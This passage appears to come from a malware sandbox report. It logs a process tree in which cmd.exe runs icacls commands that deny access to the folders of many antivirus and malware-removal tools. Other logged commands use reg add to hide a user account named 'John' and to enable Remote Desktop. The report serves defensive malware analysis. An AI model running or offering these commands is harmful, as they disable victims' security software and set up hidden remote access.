                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                4⤵
                                                                                                                                                  PID:944
                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                    icacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                    5⤵
                                                                                                                                                    • Modifies file permissions
                                                                                                                                                    PID:1216
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                  4⤵
                                                                                                                                                    PID:992
                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                      icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                      5⤵
                                                                                                                                                      • Modifies file permissions
                                                                                                                                                      PID:2260
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                    4⤵
                                                                                                                                                      PID:3052
                                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                                        icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                        5⤵
                                                                                                                                                          PID:1696
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                        4⤵
                                                                                                                                                          PID:2184
                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            5⤵
                                                                                                                                                              PID:5104
                                                                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                                                                              icacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                              5⤵
                                                                                                                                                              • Modifies file permissions
                                                                                                                                                              PID:4224
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                            4⤵
                                                                                                                                                              PID:1924
                                                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                                                icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:1212
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:4572
                                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                                    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                    PID:1128
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:340
                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:2024
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:1340
                                                                                                                                                                        • C:\Windows\system32\icacls.exe
                                                                                                                                                                          icacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:1248
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:1604
                                                                                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                                                                                              icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                              PID:4424
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:4456
                                                                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                                                                icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                PID:2972
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:3360
                                                                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                                                                  icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                  PID:1596
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:1448
                                                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                                                    icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:3108
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:2344
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Hide Artifacts: Hidden Users
                                                                                                                                                                                        PID:1592
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:3068
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:1364
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:3160
                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Hide Artifacts: Hidden Users
                                                                                                                                                                                              PID:2152
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:1932
                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:4560
                                                                                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                  icacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                  PID:2260
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:4768
                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:992
                                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                      icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:2296
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:892
                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:3052
                                                                                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                            icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                            PID:4224
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:4008
                                                                                                                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                              icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                              PID:3884
                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:2156
                                                                                                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                icacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                PID:3836
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:2432
                                                                                                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                  icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                  PID:2792
                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:4968
                                                                                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                    icacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                    PID:1100
                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:2112
                                                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                      icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                      PID:3624
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:3368
                                                                                                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                        icacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:2848
                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:1376
                                                                                                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                            icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:4456
                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:1536
                                                                                                                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                icacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                PID:764
                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:3460
                                                                                                                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                  icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                  PID:4604
                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:2856
                                                                                                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                    icacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:2344
                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:4108
                                                                                                                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                        icacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                        PID:1684
                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:1240
                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:900
                                                                                                                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                            icacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                            PID:3160
                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:3208
                                                                                                                                                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                              icacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:3792
                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:920
                                                                                                                                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                  icacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                  PID:2448
                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:3044
                                                                                                                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                    icacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                    PID:3616
                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:4144
                                                                                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                      icacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                      PID:132
                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:552
                                                                                                                                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                        icacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                        PID:3496
                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:344
                                                                                                                                                                                                                                                        • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                          icacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                          PID:3688
                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:4460
                                                                                                                                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                            icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                            PID:4092
                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:2132
                                                                                                                                                                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                              icacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                              PID:4112
                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:2852
                                                                                                                                                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                PID:4712
                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:4764
                                                                                                                                                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                  icacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  PID:4456
                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:4700
                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:1596
                                                                                                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                      icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:2860
                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:2420
                                                                                                                                                                                                                                                                        • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                          icacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                          PID:1864
                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:4676
                                                                                                                                                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                            icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                            PID:1080
                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:1800
                                                                                                                                                                                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                              icacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:4504
                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:1916
                                                                                                                                                                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                  icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                  PID:2152
                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:4348
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                    icacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                    PID:3136
                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:1324
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:4668
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                        icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:1760
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                          PID:3388
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                            icacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:3044
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                              PID:3880
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:4144
